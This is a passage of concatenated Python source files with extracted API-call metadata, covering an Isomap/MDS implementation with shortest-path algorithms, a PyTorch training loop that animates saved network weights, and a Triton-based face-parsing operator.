'(trainable=self.is_training, name=ln_name)\n', (3174, 3216), True, 'import tensorflow.keras.layers as tfkl\n'), ((3380, 3411), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer'], {'name': 'th_name'}), '(layer, name=th_name)\n', (3390, 3411), True, 'import tensorflow as tf\n'), ((4092, 4168), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[-1]'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(layer_sizes[-1], kernel_initializer=kernel_init, name=layer_name)\n', (4102, 4168), True, 'import tensorflow.keras.layers as tfkl\n'), ((4811, 4829), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (4820, 4829), True, 'import numpy as np\n'), ((5000, 5046), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (5009, 5046), True, 'import numpy as np\n'), ((5502, 5524), 'tensorflow.keras.activations.linear', 'tfka.linear', (['input_obs'], {}), '(input_obs)\n', (5513, 5524), True, 'import tensorflow.keras.activations as tfka\n'), ((1904, 1976), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1914, 1976), True, 'import tensorflow.keras.layers as tfkl\n'), ((2175, 2247), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (2185, 2247), True, 'import tensorflow.keras.layers as tfkl\n'), ((2945, 3018), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[0]'], {'kernel_initializer': 'kernel_init', 'name': 'pre_name'}), '(layer_sizes[0], kernel_initializer=kernel_init, name=pre_name)\n', (2955, 3018), True, 'import tensorflow.keras.layers as tfkl\n'), ((3648, 3713), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(size, kernel_initializer=kernel_init, name=layer_name)\n', (3658, 3713), True, 'import tensorflow.keras.layers as tfkl\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: 11360
# datetime: 2021/3/14 13:41
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_swiss_roll
from scipy.spatial import KDTree
import mpl_toolkits.mplot3d.axes3d as p3
from sklearn.cluster import AgglomerativeClustering
class ShortestPath:
@staticmethod
def floyd_algorithm(adjacency_matrix):
"""
给定一张有向带权图的邻接矩阵,求任意两点之间的最短路径
:param adjacency_matrix: 邻接矩阵,第i行j列的数代表从xi到xj的邻接距离
:return: 最短距离矩阵,路径矩阵
"""
n = adjacency_matrix.shape[0]
path_matrix = -np.ones([n, n], dtype=int)
dist_matrix = adjacency_matrix.copy()
print("adjacency_matrix = ", adjacency_matrix)
n = path_matrix.shape[0]
for v in range(n):
# 途经点循环
for i in range(n):
for j in range(n):
if dist_matrix[i, j] > dist_matrix[i, v] + dist_matrix[v, j]:
dist_matrix[i, j] = dist_matrix[i, v] + dist_matrix[v, j]
path_matrix[i, j] = v
return dist_matrix, path_matrix
@staticmethod
def print_floyd_path(path_matrix, source, destination):
if path_matrix[source, destination] < 0:
print("<{}, {}>".format(source, destination))
return
else:
# 中间经过节点
mid = path_matrix[source, destination]
ShortestPath.print_floyd_path(path_matrix, source, mid)
ShortestPath.print_floyd_path(path_matrix, mid, destination)
@staticmethod
def djikstra_algorithm(adjacency_matrix, obj_vertice):
n = adjacency_matrix.shape[0]
musk_lst = [False for _ in range(n)]
dist_lst = [np.inf for _ in range(n)]
parent_lst = [-1 for _ in range(n)]
src_vertice = obj_vertice
dist_lst[src_vertice] = 0
while False in musk_lst:
musk_lst[src_vertice] = True
for i in range(n):
if adjacency_matrix[src_vertice, i] != np.inf:
if dist_lst[src_vertice] + adjacency_matrix[src_vertice, i] < dist_lst[i]:
dist_lst[i] = dist_lst[src_vertice] + adjacency_matrix[src_vertice, i]
parent_lst[i] = src_vertice
min_dist = np.inf
for j in range(n):
if musk_lst[j] == False and dist_lst[j] < min_dist:
min_dist = dist_lst[j]
src_vertice = j
print(dist_lst)
print(parent_lst)
return dist_lst, parent_lst
@staticmethod
def print_djikstra_path(parent_lst, obj_vertex):
# 从源节点到目标节点(obj_vertex)的路径
a = obj_vertex
lst = []
while parent_lst[a] != -1:
lst.append(parent_lst[a])
a = parent_lst[a]
lst.reverse()
print("lst = ", lst)
for i in lst:
print(i, "->")
print(obj_vertex)
class ISOMAP:
def __init__(self, k):
"""
:param k: reduced dimension R^d -> R^k
"""
self.reduced_dimension = k
def make_data(self):
self.X_data, t = make_swiss_roll(1000, noise=0, random_state=0)
ward = AgglomerativeClustering(n_clusters=6, linkage='ward').fit(self.X_data)
self.Y_data = ward.labels_
def construct_graph(self, k):
"""
:param k: k-nearest neighbour
:return: adjacency matrix
"""
kd_tree = KDTree(self.X_data.copy())
n = self.X_data.shape[0]
adjacency_matrix = np.ones([n, n]) * np.inf
for i in range(n):
# 由于最近邻查询邻居包含自身,需要去除
dist_tuple, index_tuple = kd_tree.query(self.X_data[i, :], k=k+1, p=2)
dist_lst = list(dist_tuple)
index_lst = list(index_tuple)
remove_index = index_lst.index(i)
print(i, index_lst[remove_index])
dist_lst.pop(remove_index)
index_lst.pop(remove_index)
for index, value in enumerate(index_lst):
adjacency_matrix[i, value] = dist_tuple[index]
return adjacency_matrix
def Isomap(self, knn=5):
adjacency_matrix = self.construct_graph(knn)
dist_matrix, _ = ShortestPath.floyd_algorithm(adjacency_matrix)
self.D = dist_matrix
print("self.D = ", self.D)
self.MDS()
def MDS(self):
self.B = self.construct_innerprod_matrix()
if self.B is None:
return
# A是对角阵,Q是特征向量矩阵
# 由于内积矩阵是对称半正定矩阵,用svd求特征值、特征向量
u, sigma, vT = np.linalg.svd(self.B)
Qk = u[:, :self.reduced_dimension]
Ak = np.diag(sigma[:self.reduced_dimension] ** 0.5)
self.new_data = Qk @ Ak
print("new_data.shape = ", self.new_data.shape)
def construct_innerprod_matrix(self):
inf_ = np.where(self.D == np.inf)
if inf_[0].shape[0] != 0:
print("shape = ", self.D.shape)
print("not connected graph!", self.D[inf_])
return
innerprod_matrix = np.zeros(self.D.shape)
length = self.D.shape[0]
meandist2 = np.mean(list(map(lambda x: x**2, self.D)))
meandist2_column_lst = []
for j in range(length):
meandist2_column_lst.append(np.mean(list(map(lambda x: x**2,
self.D[:, j]))))
for i in range(length):
meandist2_i_row = np.mean(list(map(lambda x: x**2, self.D[i, :])))
for j in range(i, length):
meandist2_j_column = meandist2_column_lst[j]
innerprod_matrix[i, j] = -0.5 * (self.D[i, j] ** 2 - meandist2_i_row -
meandist2_j_column + meandist2)
innerprod_matrix[j, i] = innerprod_matrix[i, j]
return innerprod_matrix
def result(self):
fig = plt.figure()
# plt.title("Origin data")
ax = p3.Axes3D(fig)
ax.view_init(7, -80)
for l in np.unique(self.Y_data):
ax.scatter(self.X_data[self.Y_data == l, 0], self.X_data[self.Y_data == l, 1],
self.X_data[self.Y_data == l, 2],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
plt.show()
# ax = plt.gca()
# ax.axis("equal")
plt.figure()
plt.title("MDS")
if self.reduced_dimension == 2:
print("self.new_data = ", self.new_data)
for l in np.unique(self.Y_data):
plt.scatter(self.new_data[self.Y_data == l, 0], self.new_data[self.Y_data == l, 1],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
else:
for l in np.unique(self.Y_data):
plt.scatter(self.new_data[self.Y_data == l, 0],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
ax = plt.gca()
ax.axis("equal")
plt.show()
if __name__ == "__main__":
a = ISOMAP(2) # 降至两维
a.make_data()
a.Isomap(10) # 用KNN建图
a.result()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"numpy.zeros",
"numpy.ones",
"sklearn.datasets.make_swiss_roll",
"matplotlib.pyplot.figure",
"numpy.linalg.svd",
"numpy.where",
"sklearn.cluster.AgglomerativeClustering",
"numpy.max",
"matplotlib.pyplot.gca",
"numpy.diag",
"mpl_toolkits.mplot3d.axes3d.Axes3D",
"numpy.unique"
] |
[((3258, 3304), 'sklearn.datasets.make_swiss_roll', 'make_swiss_roll', (['(1000)'], {'noise': '(0)', 'random_state': '(0)'}), '(1000, noise=0, random_state=0)\n', (3273, 3304), False, 'from sklearn.datasets import make_swiss_roll\n'), ((4712, 4733), 'numpy.linalg.svd', 'np.linalg.svd', (['self.B'], {}), '(self.B)\n', (4725, 4733), True, 'import numpy as np\n'), ((4792, 4838), 'numpy.diag', 'np.diag', (['(sigma[:self.reduced_dimension] ** 0.5)'], {}), '(sigma[:self.reduced_dimension] ** 0.5)\n', (4799, 4838), True, 'import numpy as np\n'), ((4990, 5016), 'numpy.where', 'np.where', (['(self.D == np.inf)'], {}), '(self.D == np.inf)\n', (4998, 5016), True, 'import numpy as np\n'), ((5204, 5226), 'numpy.zeros', 'np.zeros', (['self.D.shape'], {}), '(self.D.shape)\n', (5212, 5226), True, 'import numpy as np\n'), ((6065, 6077), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6075, 6077), True, 'import matplotlib.pyplot as plt\n'), ((6130, 6144), 'mpl_toolkits.mplot3d.axes3d.Axes3D', 'p3.Axes3D', (['fig'], {}), '(fig)\n', (6139, 6144), True, 'import mpl_toolkits.mplot3d.axes3d as p3\n'), ((6195, 6217), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6204, 6217), True, 'import numpy as np\n'), ((6501, 6511), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6509, 6511), True, 'import matplotlib.pyplot as plt\n'), ((6575, 6587), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6585, 6587), True, 'import matplotlib.pyplot as plt\n'), ((6597, 6613), 'matplotlib.pyplot.title', 'plt.title', (['"""MDS"""'], {}), "('MDS')\n", (6606, 6613), True, 'import matplotlib.pyplot as plt\n'), ((7258, 7267), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (7265, 7267), True, 'import matplotlib.pyplot as plt\n'), ((7303, 7313), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7311, 7313), True, 'import matplotlib.pyplot as plt\n'), ((628, 654), 'numpy.ones', 'np.ones', (['[n, n]'], {'dtype': 'int'}), '([n, n], dtype=int)\n', (635, 654), True, 'import numpy as np\n'), ((3673, 3688), 'numpy.ones', 'np.ones', (['[n, n]'], {}), '([n, n])\n', (3680, 3688), True, 'import numpy as np\n'), ((6731, 6753), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6740, 6753), True, 'import numpy as np\n'), ((7024, 7046), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (7033, 7046), True, 'import numpy as np\n'), ((3321, 3374), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': '(6)', 'linkage': '"""ward"""'}), "(n_clusters=6, linkage='ward')\n", (3344, 3374), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((6421, 6444), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6427, 6444), True, 'import numpy as np\n'), ((6912, 6935), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6918, 6935), True, 'import numpy as np\n'), ((7169, 7192), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (7175, 7192), True, 'import numpy as np\n')]
|
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import collections as mc
import torch
import task
from torchmodel import FullModel
from configs import FullConfig
import tools
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def train(config, reload=False, save_everytrainloss=False):
# Merge model config with config from dataset
dataset_config = tools.load_config(config.data_dir)
dataset_config.update(config)
config = dataset_config
for item in config.__dict__.items():
print(item)
if not os.path.exists(config.save_path):
os.makedirs(config.save_path)
# Save config
tools.save_config(config, save_path=config.save_path)
# Load dataset
train_x, train_y, val_x, val_y = task.load_data(config.data_dir)
batch_size = config.batch_size
model = FullModel(config=config)
model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)
train_data = torch.from_numpy(train_x).float().to(device)
train_target = torch.from_numpy(train_y).long().to(device)
n_save_every = 20
ind_orn = list(range(0, 500, 50)) + list(range(1, 500, 50)) + list(range(2, 500, 50))
weight_layer1, weight_layer2 = [], []
k = 0
for ep in range(config.max_epoch):
if config.save_every_epoch:
model.save_pickle(ep)
model.save(ep)
print('[*' + '*'*50 + '*]')
print('Epoch {:d}'.format(ep))
model.train()
random_idx = np.random.permutation(config.n_train)
idx = 0
while idx < config.n_train:
if (idx//batch_size) % n_save_every == 0:
w_glo = model.w_glo
w_orn = model.w_orn
weight_layer1.append(w_orn[ind_orn, :])
weight_layer2.append(w_glo[:, :30])
k += 1
batch_indices = random_idx[idx:idx+batch_size]
idx += batch_size
res = model(train_data[batch_indices],
train_target[batch_indices])
optimizer.zero_grad()
res['loss'].backward()
optimizer.step()
np.save(os.path.join(config.save_path, 'w_layer1'), np.array(weight_layer1))
np.save(os.path.join(config.save_path, 'w_layer2'), np.array(weight_layer2))
def main_train():
config = FullConfig()
config.initial_pn2kc = 4. / config.N_PN # explicitly set for clarity
config.kc_prune_weak_weights = True
config.kc_prune_threshold = 1. / config.N_PN
config.kc_dropout_rate = 0.5
config.save_path = './files/movie'
config.max_epoch = 10
train(config)
def main_plot(path):
w1 = np.load(os.path.join(path, 'w_layer1.npy'))
w2 = np.load(os.path.join(path, 'w_layer2.npy'))
w1 = w1[:, :30, :]
w2 = w2[:, :, :5]
n_plot = 800
# n_plot = 100
w1 = w1[:n_plot]
w2 = w2[:n_plot]
w1 = w1[::2]
w2 = w2[::2]
# Normalize
w1 /= np.max(w1)
w2 /= np.max(w2)
rect = [0.1, 0.1, 0.8, 0.8]
fig = plt.figure(figsize=(7, 3))
ax = fig.add_axes(rect)
ax.set_xlim([-0.1, 2.1])
ax.set_ylim([-1, 51])
plt.axis('off')
x1, y1 = np.meshgrid(range(w1.shape[1]), range(w1.shape[2]))
x1, y1 = x1.flatten(), y1.flatten()
x2, y2 = np.meshgrid(range(w2.shape[1]), range(w2.shape[2]))
x2, y2 = x2.flatten(), y2.flatten()
lines = list()
lines += [[(0, x*49/29.), (1, y)] for x, y in zip(x1, y1)]
lines += [[(1, x), (2, y*49/4.)] for x, y in zip(x2, y2)]
lc = mc.LineCollection(lines, linewidths=2)
ax.add_collection(lc)
colors1 = np.array([[228,26,28],[77,175,74],[55,126,184]])/255.
colors2 = np.array([[27,158,119],[217,95,2],[117,112,179],
[231,41,138],[102,166,30]])/255.
ind1 = np.array([0]*10+[1]*10+[2]*10)
ax.scatter([0]*w1.shape[1], np.arange(w1.shape[1])*49/29., color=colors1[ind1], s=4)
ax.scatter([2]*w2.shape[2], np.arange(w2.shape[2])*49/4., color=colors2, s=4)
y_text = 50
fontsize = 14
ax.text(-.05, y_text, 'ORNs', fontsize=fontsize)
ax.text(.95, y_text, 'PNs', fontsize=fontsize)
ax.text(1.95, y_text, 'KCs', fontsize=fontsize)
epoch_text = ax.text(1.85, -4, '0.00 Epochs', fontsize=fontsize)
# initialization function: plot the background of each frame
# =============================================================================
# def init():
# line.set_segments([])
# return line,
# =============================================================================
# animation function. This is called sequentially
def animate(i):
n1, n2 = len(x1), len(x2)
c = np.zeros((n1+n2, 4))
c[:n1, :3] = colors1[x1//10]
c[n1:, :3] = colors2[y2]
w1_ = w1[i].T.flatten()
w2_ = w2[i].T.flatten()
c[:n1, 3] = w1_ / w1_.max()
c[n1:, 3] = w2_ / w2_.max()
lc.set_color(c)
epoch_text.set_text(f'{i/40.:0.2f} Epochs')
return ax
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate,
frames=w1.shape[0], interval=20)
writer = animation.writers['ffmpeg'](fps=30)
# anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=600)
anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=200)
if __name__ == '__main__':
main_train()
path = './files/movie'
main_plot(path)
w1 = np.load(os.path.join(path, 'w_layer1.npy'))
w2 = np.load(os.path.join(path, 'w_layer2.npy'))
|
[
"torchmodel.FullModel",
"matplotlib.animation.FuncAnimation",
"matplotlib.pyplot.figure",
"tools.save_config",
"numpy.arange",
"os.path.join",
"configs.FullConfig",
"os.path.exists",
"numpy.max",
"matplotlib.collections.LineCollection",
"tools.load_config",
"torch.cuda.is_available",
"numpy.random.permutation",
"torch.from_numpy",
"task.load_data",
"os.makedirs",
"numpy.zeros",
"matplotlib.pyplot.axis",
"numpy.array"
] |
[((267, 292), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (290, 292), False, 'import torch\n'), ((437, 471), 'tools.load_config', 'tools.load_config', (['config.data_dir'], {}), '(config.data_dir)\n', (454, 471), False, 'import tools\n'), ((701, 754), 'tools.save_config', 'tools.save_config', (['config'], {'save_path': 'config.save_path'}), '(config, save_path=config.save_path)\n', (718, 754), False, 'import tools\n'), ((812, 843), 'task.load_data', 'task.load_data', (['config.data_dir'], {}), '(config.data_dir)\n', (826, 843), False, 'import task\n'), ((893, 917), 'torchmodel.FullModel', 'FullModel', ([], {'config': 'config'}), '(config=config)\n', (902, 917), False, 'from torchmodel import FullModel\n'), ((2391, 2403), 'configs.FullConfig', 'FullConfig', ([], {}), '()\n', (2401, 2403), False, 'from configs import FullConfig\n'), ((3005, 3015), 'numpy.max', 'np.max', (['w1'], {}), '(w1)\n', (3011, 3015), True, 'import numpy as np\n'), ((3026, 3036), 'numpy.max', 'np.max', (['w2'], {}), '(w2)\n', (3032, 3036), True, 'import numpy as np\n'), ((3084, 3110), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 3)'}), '(figsize=(7, 3))\n', (3094, 3110), True, 'import matplotlib.pyplot as plt\n'), ((3198, 3213), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3206, 3213), True, 'import matplotlib.pyplot as plt\n'), ((3587, 3625), 'matplotlib.collections.LineCollection', 'mc.LineCollection', (['lines'], {'linewidths': '(2)'}), '(lines, linewidths=2)\n', (3604, 3625), True, 'from matplotlib import collections as mc\n'), ((3864, 3904), 'numpy.array', 'np.array', (['([0] * 10 + [1] * 10 + [2] * 10)'], {}), '([0] * 10 + [1] * 10 + [2] * 10)\n', (3872, 3904), True, 'import numpy as np\n'), ((5172, 5242), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'frames': 'w1.shape[0]', 'interval': '(20)'}), '(fig, animate, frames=w1.shape[0], interval=20)\n', (5195, 5242), True, 'import matplotlib.animation as animation\n'), ((607, 639), 'os.path.exists', 'os.path.exists', (['config.save_path'], {}), '(config.save_path)\n', (621, 639), False, 'import os\n'), ((649, 678), 'os.makedirs', 'os.makedirs', (['config.save_path'], {}), '(config.save_path)\n', (660, 678), False, 'import os\n'), ((1554, 1591), 'numpy.random.permutation', 'np.random.permutation', (['config.n_train'], {}), '(config.n_train)\n', (1575, 1591), True, 'import numpy as np\n'), ((2208, 2250), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer1"""'], {}), "(config.save_path, 'w_layer1')\n", (2220, 2250), False, 'import os\n'), ((2252, 2275), 'numpy.array', 'np.array', (['weight_layer1'], {}), '(weight_layer1)\n', (2260, 2275), True, 'import numpy as np\n'), ((2289, 2331), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer2"""'], {}), "(config.save_path, 'w_layer2')\n", (2301, 2331), False, 'import os\n'), ((2333, 2356), 'numpy.array', 'np.array', (['weight_layer2'], {}), '(weight_layer2)\n', (2341, 2356), True, 'import numpy as np\n'), ((2722, 2756), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (2734, 2756), False, 'import os\n'), ((2775, 2809), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (2787, 2809), False, 'import os\n'), ((3671, 3727), 'numpy.array', 'np.array', (['[[228, 26, 28], [77, 175, 74], [55, 126, 184]]'], {}), '([[228, 26, 28], [77, 175, 74], [55, 126, 184]])\n', (3679, 3727), True, 'import numpy as np\n'), ((3739, 3833), 'numpy.array', 'np.array', (['[[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [102, 166, 30]]'], {}), '([[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [\n 102, 166, 30]])\n', (3747, 3833), True, 'import numpy as np\n'), ((4751, 4773), 'numpy.zeros', 'np.zeros', (['(n1 + n2, 4)'], {}), '((n1 + n2, 4))\n', (4759, 4773), True, 'import numpy as np\n'), ((5410, 5441), 'os.path.join', 'os.path.join', (['path', '"""movie.mp4"""'], {}), "(path, 'movie.mp4')\n", (5422, 5441), False, 'import os\n'), ((5576, 5610), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (5588, 5610), False, 'import os\n'), ((5629, 5663), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (5641, 5663), False, 'import os\n'), ((3927, 3949), 'numpy.arange', 'np.arange', (['w1.shape[1]'], {}), '(w1.shape[1])\n', (3936, 3949), True, 'import numpy as np\n'), ((4016, 4038), 'numpy.arange', 'np.arange', (['w2.shape[2]'], {}), '(w2.shape[2])\n', (4025, 4038), True, 'import numpy as np\n'), ((1024, 1049), 'torch.from_numpy', 'torch.from_numpy', (['train_x'], {}), '(train_x)\n', (1040, 1049), False, 'import torch\n'), ((1088, 1113), 'torch.from_numpy', 'torch.from_numpy', (['train_y'], {}), '(train_y)\n', (1104, 1113), False, 'import torch\n')]
|
from abc import ABC
import cv2
import numpy as np
from Operators.DummyAlgorithmWithModel import DummyAlgorithmWithModel
from Utils.GeometryUtils import center_pad_image_with_specific_base, \
resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation
from Utils.InferenceHelpers import TritonInferenceHelper
class FaceParsingOperator(DummyAlgorithmWithModel, ABC):
name = 'FaceParsing'
__version__ = 'v1.0.20210323'
def __init__(self, _inference_config, _is_test):
super().__init__(_inference_config, _is_test)
class GeneralFaceParsing(FaceParsingOperator):
"""
获取人脸面部分区,除了面部区域,其他地方准确率很低
例如耳环、眼镜等
"""
name = '自然场景下基于BiSeNet人脸面部的语义分割'
__version__ = 'v1.0.20210323'
def __init__(self, _inference_config, _is_test):
"""
每个下标对应的意思
0 背景
1 皮肤区域
2 右眉毛
3 左眉毛
4 右眼睛
5 左眼睛
6 眼镜
7 右耳朵
8 左耳朵
9 耳环
10 鼻子
11 口腔
12 上嘴唇
13 下嘴唇
14 颈部
15
16 衣服
17 头发
18 帽子
"""
super().__init__(_inference_config, _is_test)
# 模型未限制,但是为了保证效率,将图像都统一到512
self.candidate_image_size = (512, 512)
def get_inference_helper(self):
if self.inference_config['name'] == 'triton':
inference_helper = TritonInferenceHelper('FaceParsing',
self.inference_config['triton_url'],
self.inference_config['triton_port'],
'FaceParsing', 1)
inference_helper.add_image_input('INPUT__0', (512, 512, 3), '检测用rgb的图像',
([103.53, 116.28, 123.675], [57.375, 57.12, 58.395]))
inference_helper.add_output('OUTPUT__0', (19, 512, 512), '每个类别的区域')
self.inference_helper = inference_helper
else:
raise NotImplementedError(
f"{self.inference_config['name']} helper for face parsing not implement")
def execute(self, _image, _landmark_info=None):
to_return_result = {
'semantic_segmentation': np.zeros((_image.shape[1], _image.shape[0]), dtype=np.uint8),
}
if _landmark_info is not None:
corrected_face_image, rotate_back_function = correct_face_orientation(_image, _landmark_info)
else:
corrected_face_image = _image
def _rotate_back_function(_image):
return _image
rotate_back_function = _rotate_back_function
original_h, original_w = corrected_face_image.shape[:2]
resized_image = resize_with_long_side(corrected_face_image, 512)
resized_h, resized_w = resized_image.shape[:2]
padded_image, (width_pad_ratio, height_pad_ratio) = center_pad_image_with_specific_base(
resized_image,
_width_base=512,
_height_base=512,
_output_pad_ratio=True
)
candidate_image = cv2.cvtColor(force_convert_image_to_bgr(padded_image), cv2.COLOR_BGR2RGB)
candidate_h, candidate_w = candidate_image.shape[:2]
if isinstance(self.inference_helper, TritonInferenceHelper):
result = self.inference_helper.infer(_need_tensor_check=False, INPUT__0=candidate_image.astype(np.float32))
semantic_index = result['OUTPUT__0'].squeeze()
else:
raise NotImplementedError(
f"{self.inference_helper.type_name} helper for face parsing not implement")
left_width_pad = int(width_pad_ratio * candidate_w)
top_height_pad = int(height_pad_ratio * candidate_h)
# 去除pad
semantic_index_without_pad = semantic_index[
top_height_pad:top_height_pad + resized_h,
left_width_pad:left_width_pad + resized_w
]
# 恢复resize
resize_back_semantic_index = cv2.resize(semantic_index_without_pad, (original_w, original_h),
interpolation=cv2.INTER_NEAREST)
# 恢复图像方向
original_orientation_semantic_index = rotate_back_function(resize_back_semantic_index)
to_return_result['semantic_segmentation'] = original_orientation_semantic_index
return to_return_result
if __name__ == '__main__':
from argparse import ArgumentParser
from Utils.AnnotationTools import annotate_segmentation
from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect
from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p
from Utils.GeometryUtils import get_rotated_box_roi_from_image
ag = ArgumentParser('Face Parsing Example')
ag.add_argument('-i', '--image_path', dest='image_path', type=str, required=True, help='本地图像路径')
ag.add_argument('-u', '--triton_url', dest='triton_url', type=str, required=True, help='triton url')
ag.add_argument('-p', '--triton_port', dest='triton_port', type=int, default=8001, help='triton grpc 端口')
args = ag.parse_args()
# 假设图中只有一个人头
img = cv2.imread(args.image_path)
face_parsing_handler = GeneralFaceParsing({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True)
ultra_light_face_detect_handler = GeneralUltraLightFaceDetect({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True, 0.7, 0.5)
landmark106p_detect_handler = GeneralLandmark106p({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True)
face_bbox = ultra_light_face_detect_handler.execute(img)['locations'][0]['box_info']
cropped_image = get_rotated_box_roi_from_image(img, face_bbox, 1.35)
landmark_info = landmark106p_detect_handler.execute(cropped_image)
landmark106p_with_bbox_result_image = cropped_image.copy()
landmark106p_with_bbox_result_all_points = [(x, y) for x, y in
zip(landmark_info['x_locations'],
landmark_info['y_locations'])
]
face_parsing_with_bbox_result = face_parsing_handler.execute(cropped_image, landmark_info)
face_parsing_with_bbox_result_image = cropped_image.copy()
face_parsing_with_bbox_result_image = annotate_segmentation(
face_parsing_with_bbox_result_image,
face_parsing_with_bbox_result['semantic_segmentation']
)
cv2.imshow(f'face_parsing_with_bbox_result_image', face_parsing_with_bbox_result_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p",
"Utils.AnnotationTools.annotate_segmentation",
"argparse.ArgumentParser",
"Utils.GeometryUtils.correct_face_orientation",
"Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect",
"cv2.waitKey",
"cv2.destroyAllWindows",
"Utils.GeometryUtils.resize_with_long_side",
"Utils.InferenceHelpers.TritonInferenceHelper",
"numpy.zeros",
"Utils.GeometryUtils.force_convert_image_to_bgr",
"Utils.GeometryUtils.get_rotated_box_roi_from_image",
"cv2.imread",
"Utils.GeometryUtils.center_pad_image_with_specific_base",
"cv2.imshow",
"cv2.resize"
] |
[((4815, 4853), 'argparse.ArgumentParser', 'ArgumentParser', (['"""Face Parsing Example"""'], {}), "('Face Parsing Example')\n", (4829, 4853), False, 'from argparse import ArgumentParser\n'), ((5224, 5251), 'cv2.imread', 'cv2.imread', (['args.image_path'], {}), '(args.image_path)\n', (5234, 5251), False, 'import cv2\n'), ((5456, 5588), 'Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect', 'GeneralUltraLightFaceDetect', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)', '(0.7)', '(0.5)'], {}), "({'name': 'triton', 'triton_url': args.\n triton_url, 'triton_port': args.triton_port}, True, 0.7, 0.5)\n", (5483, 5588), False, 'from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect\n'), ((5648, 5761), 'Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p', 'GeneralLandmark106p', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)'], {}), "({'name': 'triton', 'triton_url': args.triton_url,\n 'triton_port': args.triton_port}, True)\n", (5667, 5761), False, 'from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p\n'), ((5897, 5949), 'Utils.GeometryUtils.get_rotated_box_roi_from_image', 'get_rotated_box_roi_from_image', (['img', 'face_bbox', '(1.35)'], {}), '(img, face_bbox, 1.35)\n', (5927, 5949), False, 'from Utils.GeometryUtils import get_rotated_box_roi_from_image\n'), ((6565, 6683), 'Utils.AnnotationTools.annotate_segmentation', 'annotate_segmentation', (['face_parsing_with_bbox_result_image', "face_parsing_with_bbox_result['semantic_segmentation']"], {}), "(face_parsing_with_bbox_result_image,\n face_parsing_with_bbox_result['semantic_segmentation'])\n", (6586, 6683), False, 'from 